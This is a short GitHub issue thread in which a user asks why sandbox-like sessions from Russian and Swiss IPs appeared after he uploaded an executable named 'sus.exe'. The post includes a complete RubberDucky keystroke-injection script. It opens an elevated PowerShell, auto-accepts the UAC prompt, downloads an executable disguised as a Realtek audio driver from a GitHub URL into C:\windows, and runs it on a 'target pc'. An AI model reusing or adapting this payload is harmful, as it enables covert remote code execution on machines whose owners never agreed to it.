Closed david09baz closed 1 year ago
sounds like an automated scanner, running in a normal sandbox vm
Scanning for what?
executables
Ok thanks i was wondering. Could this have been the cause of submitting it to Virustotal for sandbox analysis
yes
I built an exe, i uploaded it to github just for myself called "sus.exe" it got 0 views, all of a sudden i'm getting sessions popping up and they are russian. I quickly took a screenshot and I got this . It appears to be a VM and the hostname is GlY14zXNwx7W. The IP is 95.25.71.4 This is worrying and I have no idea who could've gotten my exe and how? I used this RubberDucky script to execute it from the internet, i dont think there are any viruses.
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) REM Description: Downloads an .exe file from the URL and runs it on the target pc. REM Version: 1.0 REM Category: Execution DELAY 950 WINDOWS d DELAY 950 WINDOWS r DELAY 650 STRING powershell Start-Process powershell -Verb runAs ENTER DELAY 870 LEFTARROW ENTER DELAY 850 ALT y DELAY 13000 STRING $url = "https://github.com/david09baz/sus/blob/main/Realtek%20HD%20High%20Definition%20Audio.exe?raw=true"; $output = "C:\windows\41281687.exe"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath "C:\windows\41281687.exe"; exit ENTER
I am so confused I would love a possible answer to this. There is one more session hostname is "george" with different locations like Zurich with ISP of Packethub.net